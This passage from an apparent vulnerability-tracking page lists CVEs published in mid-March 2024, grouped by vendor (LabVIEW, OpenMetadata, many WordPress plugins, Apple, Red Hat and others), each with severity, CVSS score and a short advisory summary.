CVESeverityCVSSKEVPublishedSummary
CVE-2024-23612High7.82024-03-11An improper error handling vulnerability in LabVIEW may result in remote code execution.
CVE-2024-23611High7.82024-03-11An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.
CVE-2024-23610High7.82024-03-11An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.
CVE-2024-23609High7.82024-03-11An improper error handling vulnerability in LabVIEW may result in remote code execution.
CVE-2024-23608High7.82024-03-11An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.

Open-metadata · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28255Critical9.82024-03-15OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28253Critical9.42024-03-15OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28848High8.82024-03-15OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28847High8.82024-03-15OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28254High8.82024-03-15OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.

Themeisle · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2126Medium6.42024-03-13The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping.
CVE-2024-1684Medium6.42024-03-13The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to i…
CVE-2024-1499Medium6.42024-03-13The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input san…
CVE-2024-1497Medium6.42024-03-13The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping.
CVE-2024-1691Medium6.12024-03-13The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3…

Webtechstreet · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1358High8.82024-03-13The Elementor Addon Elements plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.12.12 via the render function.
CVE-2024-1422Medium6.42024-03-13The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output esca…
CVE-2024-1393Medium6.42024-03-13The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitizati…
CVE-2024-1392Medium6.42024-03-13The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization…
CVE-2024-1391Medium6.42024-03-13The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eae_custom_overlay_switcher’ attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient…

Yooooomi · 5 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28194Critical9.12024-03-13your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28195High8.12024-03-13your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28193Medium6.52024-03-13your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28196Medium6.52024-03-13your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28192Medium5.32024-03-13your_spotify is an open source, self hosted Spotify tracking dashboard.

Apple · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-42938High7.82024-03-14A logic issue was addressed with improved checks.
CVE-2024-23300High7.82024-03-12A use-after-free issue was addressed with improved memory management.
CVE-2024-23298Medium5.52024-03-15A logic issue was addressed with improved state management.
CVE-2024-1221Low3.12024-03-14This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint.

Badger Meter · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1301Critical9.82024-03-12SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier.
CVE-2024-1302High7.32024-03-12Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier.
CVE-2024-1303Medium6.52024-03-12Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier.
CVE-2024-1304Medium6.32024-03-12Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier.

Brizy · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1311High8.82024-03-13The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40.
CVE-2024-1296Medium6.42024-03-13The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user suppli…
CVE-2024-1293Medium6.42024-03-13The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping.
CVE-2024-1291Medium6.42024-03-13The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping.

Exclusiveaddons · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2028Medium6.42024-03-13The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1414Medium6.42024-03-13The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1413Medium6.42024-03-13The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1234Medium6.42024-03-13The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.

Fortra · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25153Critical9.82024-03-13A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request.
CVE-2024-25155High7.22024-03-13In FileCatalyst Direct 3.8.8 and earlier through 3.8.6, the web server does not properly sanitize illegal characters in a URL which is then displayed on a subsequent error page.
CVE-2024-25156Medium6.52024-03-14A path traversal vulnerability exists in GoAnywhere MFT prior to 7.4.2 which allows attackers to circumvent endpoint-specific permission checks in the GoAnywhere Admin and Web Clients.
CVE-2024-25154Medium5.32024-03-13Improper URL validation leads to path traversal in FileCatalyst Direct 3.8.8 and earlier allowing an encoded payload to cause the web server to return files located outside of the web root which may lead to data leakage.

Opentext · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-38534High8.62024-03-13Improper authentication vulnerability in OpenText™ Exceed Turbo X affecting versions 12.5.0 and 12.5.1.
CVE-2023-38536Medium6.42024-03-13HTML injection in OpenText™ Exceed Turbo X affecting version 12.5.1.
CVE-2023-7248Medium5.02024-03-15Certain functionality in OpenText Vertica Management console might be prone to bypass via crafted requests.  The vulnerability would affect one of Vertica’s authentication functionalities by allowing specially crafted requests and sequenc…
CVE-2023-38535Medium4.72024-03-13Use of Hard-coded Cryptographic Key vulnerability in OpenText™ Exceed Turbo X affecting versions 12.5.1 and 12.5.2.

Red Hat · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2182Medium6.52024-03-12A flaw was found in the Open Virtual Network (OVN).
CVE-2023-6725Medium5.52024-03-15An access-control flaw was found in the OpenStack Designate component where private configuration information including access keys to BIND were improperly made world readable.
CVE-2024-1441Medium5.52024-03-11An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array.
CVE-2024-1979Low3.52024-03-13A vulnerability was found in Quarkus.

Wpwax · 4 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2006High8.82024-03-13The Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in…
CVE-2024-1951High7.52024-03-13The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input.
CVE-2024-1950High7.52024-03-13The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode.
CVE-2023-50886Medium4.32024-03-15Cross-Site Request Forgery (CSRF), Incorrect Authorization vulnerability in wpWax Legal Pages.This issue affects Legal Pages: from n/a through 1.3.7.

Arcserve · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0799Critical9.82024-03-13An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.
CVE-2024-0800High8.82024-03-13A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet.
CVE-2024-0801High7.52024-03-13A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll.

Cms Made Simple · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1527Critical9.82024-03-12Unrestricted file upload vulnerability in CMS Made Simple, affecting version 2.2.14.
CVE-2024-1529High7.42024-03-12Vulnerability in CMS Made Simple 2.2.14, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/adduser.php, in multiple parameters.
CVE-2024-1528High7.42024-03-12CMS Made Simple version 2.2.14, does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/moduleinterface.php, in multiple parameters.

Debian · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-26614Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: tcp: make sure init the accept_queue's spinlocks once When I run syz's reproduction C program locally, it causes the following issue: pvqspinlock: lock 0xffff9d181cd5c66…
CVE-2023-52489Medium4.72024-03-11In the Linux kernel, the following vulnerability has been resolved: mm/sparsemem: fix race in accessing memory_section->usage The below race is observed on a PFN which falls into the device memory region with the system memory configurat…
CVE-2023-52492Medium4.42024-03-11In the Linux kernel, the following vulnerability has been resolved: dmaengine: fix NULL pointer in channel unregistration function __dma_async_device_channel_register() can fail.

Hammadh · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1772High8.82024-03-13The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_dat…
CVE-2024-0828Medium5.42024-03-13The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including…
CVE-2024-0827Medium4.32024-03-13The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4.

Livemesh · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25598Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Elementor allows Stored XSS.This issue affects Livemesh Addons for Elementor: from n/a through 8.3.
CVE-2024-27986Medium6.52024-03-14Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Elementor Addons by Livemesh allows Stored XSS.This issue affects Elementor Addons by Livemesh: from n/a through 8.3.5.
CVE-2024-2079Medium6.42024-03-13The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization…

Metagauss · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1321Medium5.32024-03-13The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2.
CVE-2024-1127Medium4.32024-03-13The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1.
CVE-2024-1126Medium4.32024-03-13The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and includi…

Movistar · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2414High8.82024-03-13The primary channel is unprotected on Movistar 4G router affecting E version S_WLD71-T1_v2.0.201820.
CVE-2024-2415High7.82024-03-13Command injection vulnerability in Movistar 4G router affecting version ES_WLD71-T1_v2.0.201820.
CVE-2024-2416Medium6.52024-03-13Cross-Site Request Forgery vulnerability in Movistar's 4G router affecting version ES_WLD71-T1_v2.0.201820.

Palo Alto Networks · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2431Medium5.52024-03-13An issue in the Palo Alto Networks GlobalProtect app enables a non-privileged user to disable the GlobalProtect app in configurations that allow a user to disable GlobalProtect with a passcode.
CVE-2024-2432Medium4.52024-03-13A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges.
CVE-2024-2433Medium4.32024-03-13An improper authorization vulnerability in Palo Alto Networks Panorama software enables an authenticated read-only administrator to upload files using the web interface and completely fill one of the disk partitions with those uploaded fil…

Peering-manager · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28114High8.12024-03-12Peering Manager is a BGP session management tool.
CVE-2024-28112Medium6.12024-03-12Peering Manager is a BGP session management tool.
CVE-2024-28113Low3.52024-03-12Peering Manager is a BGP session management tool.

Pluginus · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1795High8.82024-03-15The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the u…
CVE-2024-1796Medium6.42024-03-15The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitizati…
CVE-2023-50861Medium4.32024-03-15Cross-Site Request Forgery (CSRF) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce (formerly WOOF).This issue affects HUSKY – Products Filter for WooCommerce (formerly WOOF): from n/a through 1.3.4.3.

Properfraction · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1806Medium6.42024-03-13The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to…
CVE-2024-1535Medium6.42024-03-13The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to…
CVE-2024-1409Medium6.42024-03-13The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all…

Skyhigh · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0313Medium5.52024-03-14A malicious insider exploiting this vulnerability can circumvent existing security controls put in place by the organization.
CVE-2024-0312Medium5.52024-03-14A malicious insider can uninstall Skyhigh Client Proxy without a valid uninstall password.
CVE-2024-0311Medium5.52024-03-14A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code.

Sonicwall · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-22397High8.32024-03-14Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in the SonicOS SSLVPN portal allows a remote authenticated attacker as a firewall 'admin' user to store and execute arbitrary JavaScript code.
CVE-2024-22396Medium5.32024-03-14An Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload.
CVE-2024-22398Medium4.92024-03-14An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and de…

Surya2developer · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2481Medium6.52024-03-15A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0.
CVE-2024-2483Medium4.32024-03-15A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0.
CVE-2024-2482Low3.72024-03-15A vulnerability has been found in Surya2Developer Hostel Management Service 1.0 and classified as problematic.

Vantage6 · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-24562Medium5.42024-03-14vantage6-UI is the official user interface for the vantage6 server.
CVE-2024-24770Medium5.32024-03-14vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation.
CVE-2024-23823Medium4.22024-03-14vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation.

Wpdeveloper · 3 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1536High7.42024-03-13The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and includi…
CVE-2024-1854Medium6.42024-03-13The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sa…
CVE-2024-1537Medium6.42024-03-13The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including…

Argoproj · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28175Critical9.02024-03-13Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.
CVE-2023-50726Medium6.42024-03-13Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.

Artibot · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0447Medium5.02024-03-13The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6.
CVE-2024-0449Medium4.42024-03-13The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping.

Autopolis · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0683High7.32024-03-13The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14.
CVE-2024-2395High7.32024-03-12The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14.

Bdthemes · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1508Medium6.42024-03-13The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient inp…
CVE-2024-1507Medium6.42024-03-13The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.3 due to insufficient input sanitizatio…

Carmelo · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25250Critical9.82024-03-13SQL Injection vulnerability in code-projects Agro-School Management System 1.0 allows attackers to run arbitrary code via the Login page.
CVE-2024-24105High7.82024-03-13SQL Injection vulnerability in Code-projects Computer Science Time Table System 1.0 allows attackers to run arbitrary code via adminFormvalidation.php.

Cloudflare · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1765Medium5.92024-03-12Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client.
CVE-2024-1410Low3.72024-03-12Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption.

Codecabin · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1582Medium6.42024-03-13The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgmza' shortcode in all versions up to, and including, 9.0.32 due to insufficient input sanitization and output e…
CVE-2023-4839Medium4.42024-03-13The WP Go Maps for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping.

Codename065 · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6954Medium6.42024-03-13The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.2.85 due to insufficient input sanitization and output escaping on user suppli…
CVE-2023-6785Medium5.32024-03-13The Download Manager plugin for WordPress is vulnerable to unauthorized file download of files added via the plugin in all versions up to, and including, 3.2.84.

Cyberlord92 · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2172Critical9.82024-03-13The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and includ…
CVE-2024-0681Medium5.32024-03-13The Page Restriction WordPress (WP) – Protect WP Pages/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4.

Devitemsllc · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1421Medium6.42024-03-12The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘border_type’ attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input…
CVE-2024-1397Medium6.42024-03-12The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on…

Directus · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28239Medium5.42024-03-12Directus is a real-time API and App dashboard for managing SQL database content.
CVE-2024-28238Low2.32024-03-12Directus is a real-time API and App dashboard for managing SQL database content.

Edge22 · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1479Medium5.32024-03-13The WP Show Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 via the wpsp_display function.
CVE-2024-1452Medium4.32024-03-13The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop.

File Manager · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6825Critical9.92024-03-13The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the mk_file_folder_manager…
CVE-2023-7015Medium6.12024-03-13The File Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tb' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping.

Gpac · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28318High7.12024-03-15gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain a out of boundary write vulnerability via swf_get_string at scene_manager/swf_parse.c:325
CVE-2024-28319Medium6.22024-03-15gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out of boundary read vulnerability via gf_dash_setup_period media_tools/dash_client.c:6374

Inisev · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0559Medium6.52024-03-11The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scr…
CVE-2024-0561Medium5.42024-03-11The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Sc…

Mha Sistemas · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2480Medium6.32024-03-15A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0.
CVE-2024-2479Low3.52024-03-15A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0.

Najeebmedia · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0830Medium4.32024-03-13The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.
CVE-2024-0829Medium4.32024-03-13The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0.

Ndijkstra · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1645Medium4.32024-03-11The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3.
CVE-2024-1400Medium4.32024-03-11The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3.

Rejetto · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1226High7.52024-03-12The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers.
CVE-2024-1227Medium6.52024-03-12An open redirect vulnerability, the exploitation of which could allow an attacker to create a custom URL and redirect a legitimate page to a malicious site.

Roxnor · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1763Medium6.52024-03-13The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp_social/v1/ REST API endpoint in all versions up to, and including, 3.0.0.
CVE-2024-1585Medium6.42024-03-13The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escapi…

Sky Co.,ltd. · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-21805High7.82024-03-12Improper access control vulnerability exists in the specific folder of SKYSEA Client View versions from Ver.16.100 prior to Ver.19.2.
CVE-2024-24964Medium6.32024-03-12Improper access control vulnerability exists in the resident process of SKYSEA Client View versions from Ver.11.220 prior to Ver.19.2.

Themegrill · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1462Medium5.32024-03-13The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API.
CVE-2024-1370Medium5.32024-03-13The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8.

Tibco Software Inc. · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1138High8.82024-03-12The FTL Server component of TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition contains a vulnerability that allows a low privileged attacker with network access to execute a privilege escalation on the affected ftlserver.
CVE-2024-1137Medium4.32024-03-12The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients.

Ultimatemember · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1071Critical9.82024-03-13The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficie…
CVE-2024-2123High7.22024-03-13The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and incl…

Wago · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2015-10123High8.82024-03-13An unautheticated remote attacker could send specifically crafted packets to a affected device.
CVE-2018-25090Medium5.42024-03-13An unauthenticated remote attacker can use an XSS attack due to improper neutralization of input during web page generation.

Zemana · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
